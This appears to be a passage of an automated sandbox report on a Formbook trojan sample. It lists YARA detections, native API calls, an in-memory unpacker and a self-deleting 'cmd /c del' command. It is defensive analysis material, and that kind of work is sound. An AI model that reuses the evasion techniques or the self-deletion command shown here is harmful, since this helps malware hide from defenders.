          Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 0_2_0159E9F8
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 0_2_0159E9EA
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 0_2_0159BD9C
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_00401028
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_00401174
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041D278
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041D338
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041CBFB
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_00408C8B
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_00408C90
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041BD37
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041C74F
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189F900
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B4120
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AB090
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C20A0
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019620A8
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019628EC
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01951002
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0196E824
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CEBB0
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195DBD2
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019503DA
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01962B28
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BAB40
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019622AE
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0194FA2B
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C2581
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019625DD
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AD5E0
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01962D07
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01890D20
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01961D55
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A841F
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195D466
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0196DFCE
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01961FF1
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01962EF7
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195D616
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B6E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DDBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03634120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036D1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E28EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036420A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03636E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DD616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03610D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03642581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DD466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321D338
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321CBFB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321D278
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321C74F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03202FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321BD37
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03202D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03208C8B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03208C90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0361B150 appears 35 times
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: String function: 0189B150 appears 48 times
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_004185EB NtCreateFile,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041871A NtClose,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018DB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018DA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018DAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9560 NtWriteFile,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018DA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018DA770 NtOpenThread,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0365A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0365B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0365A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0365A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03659520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0365AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03218720 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_032187D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_032186A0 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_032185F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321871A NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_032185EB NtCreateFile,
          Source: 1D4l9eR0W4.exe, 00000000.00000002.664696995.0000000000EE8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLi.exe4 vs 1D4l9eR0W4.exe
          Source: 1D4l9eR0W4.exe, 00000000.00000002.664916018.00000000015A0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 1D4l9eR0W4.exe
          Source: 1D4l9eR0W4.exe, 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs 1D4l9eR0W4.exe
          Source: 1D4l9eR0W4.exe, 00000000.00000002.666422561.0000000006610000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs 1D4l9eR0W4.exe
          Source: 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs 1D4l9eR0W4.exe
          Source: 1D4l9eR0W4.exe, 00000003.00000000.661143351.0000000000E58000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLi.exe4 vs 1D4l9eR0W4.exe
          Source: 1D4l9eR0W4.exe, 00000003.00000002.714245379.0000000001B1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1D4l9eR0W4.exe
          Source: 1D4l9eR0W4.exe, 00000003.00000002.714005352.000000000198F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1D4l9eR0W4.exe
          Source: 1D4l9eR0W4.exe, 00000003.00000002.714367021.0000000001BC2000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs 1D4l9eR0W4.exe
          Source: 1D4l9eR0W4.exeBinary or memory string: OriginalFilenameLi.exe4 vs 1D4l9eR0W4.exe
          Source: 1D4l9eR0W4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: 1D4l9eR0W4.exeVirustotal: Detection: 25%
          Source: 1D4l9eR0W4.exeReversingLabs: Detection: 24%
          Source: 1D4l9eR0W4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\1D4l9eR0W4.exe "C:\Users\user\Desktop\1D4l9eR0W4.exe"
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess created: C:\Users\user\Desktop\1D4l9eR0W4.exe C:\Users\user\Desktop\1D4l9eR0W4.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess created: C:\Users\user\Desktop\1D4l9eR0W4.exe C:\Users\user\Desktop\1D4l9eR0W4.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1D4l9eR0W4.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/10
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 1D4l9eR0W4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 1D4l9eR0W4.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: 1D4l9eR0W4.exe, 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, 1D4l9eR0W4.exe, 00000003.00000002.714005352.000000000198F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 1D4l9eR0W4.exe, 1D4l9eR0W4.exe, 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, 1D4l9eR0W4.exe, 00000003.00000002.714005352.000000000198F000.00000040.00000001.sdmp, wlanext.exe, wlanext.exe, 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdb source: 1D4l9eR0W4.exe, 00000003.00000002.714332060.0000000001BB0000.00000040.00020000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: 1D4l9eR0W4.exe, 00000003.00000002.714332060.0000000001BB0000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: 1D4l9eR0W4.exe, cC/cP.cs.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.1D4l9eR0W4.exe.e80000.0.unpack, cC/cP.cs.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.1D4l9eR0W4.exe.e80000.0.unpack, cC/cP.cs.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.1D4l9eR0W4.exe.df0000.1.unpack, cC/cP.cs.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.1D4l9eR0W4.exe.df0000.1.unpack, cC/cP.cs.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.1D4l9eR0W4.exe.df0000.0.unpack, cC/cP.cs.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.1D4l9eR0W4.exe.df0000.3.unpack, cC/cP.cs.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.1D4l9eR0W4.exe.df0000.2.unpack, cC/cP.cs.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.1D4l9eR0W4.exe.df0000.5.unpack, cC/cP.cs.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.1D4l9eR0W4.exe.df0000.9.unpack, cC/cP.cs.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.1D4l9eR0W4.exe.df0000.7.unpack, cC/cP.cs.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 0_2_00E86C63 push es; ret
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041A80B push ecx; ret
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041C514 push dword ptr [1A4A77D4h]; ret
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_004155CA push FFFFFFC6h; iretd
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0041B7E5 push eax; ret
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_00DF6C63 push es; ret
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0366D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321B832 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321B83B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321A80B push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321B89C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321B7E5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0321C514 push dword ptr [1A4A77D4h]; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_032155CA push FFFFFFC6h; iretd
          Source: 1D4l9eR0W4.exeStatic PE information: 0xEB22348E [Mon Jan 3 10:03:58 2095 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.74726232744

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
